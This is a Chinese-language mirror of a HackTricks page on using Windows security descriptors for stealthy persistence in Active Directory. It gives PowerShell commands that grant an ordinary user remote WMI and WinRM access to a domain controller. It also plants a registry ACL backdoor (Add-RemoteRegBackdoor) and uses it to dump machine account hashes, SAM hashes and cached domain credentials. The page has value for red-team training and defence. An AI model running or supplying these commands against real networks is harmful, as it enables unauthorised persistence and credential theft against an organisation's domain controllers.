mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
4.8 KiB
4.8 KiB
安全描述符
从零开始学习AWS黑客攻击直至成为专家,通过 htARTE (HackTricks AWS Red Team Expert)!
支持HackTricks的其他方式:
- 如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF版本,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
安全描述符
安全描述符定义语言(SDDL)定义了用于描述安全描述符的格式。SDDL使用ACE字符串表示DACL和SACL:ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid;
安全描述符用于存储一个对象对另一个对象的权限。如果您能对一个对象的安全描述符进行微小的更改,您可以获得对该对象的非常有趣的权限,而无需成为特权组的成员。
因此,这种持久化技术基于获得对某些对象的每一个所需权限的能力,以便能够执行通常需要管理员权限的任务,但无需成为管理员。
访问WMI
您可以给予用户权限远程执行WMI 使用这个:
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc –namespace 'root\cimv2' -Verbose
Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose #Remove
访问WinRM
授予用户访问winrm PS控制台的权限使用此方法:
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #Remove
远程访问哈希值
通过创建一个使用 DAMP 的 Reg 后门,访问注册表并转储哈希值,这样你可以随时检索计算机的哈希值、SAM 以及计算机中任何缓存的 AD 凭据。因此,将这个权限授予针对域控制器计算机的普通用户非常有用:
# allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.
Add-RemoteRegBackdoor -ComputerName <remotehost> -Trustee student1 -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.
Get-RemoteMachineAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.
Get-RemoteLocalAccountHash -ComputerName <remotehost> -Verbose
# Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.
Get-RemoteCachedCredential -ComputerName <remotehost> -Verbose
查看Silver Tickets学习如何使用域控制器计算机账户的哈希。
从零开始学习AWS黑客技术,成为 htARTE (HackTricks AWS红队专家)!
其他支持HackTricks的方式:
- 如果您希望在HackTricks中看到您的公司广告或下载HackTricks的PDF,请查看订阅计划!
- 获取官方PEASS & HackTricks商品
- 发现PEASS家族,我们独家的NFTs系列
- 加入 💬 Discord群组或telegram群组或在Twitter 🐦 上关注我 @carlospolopm。
- 通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。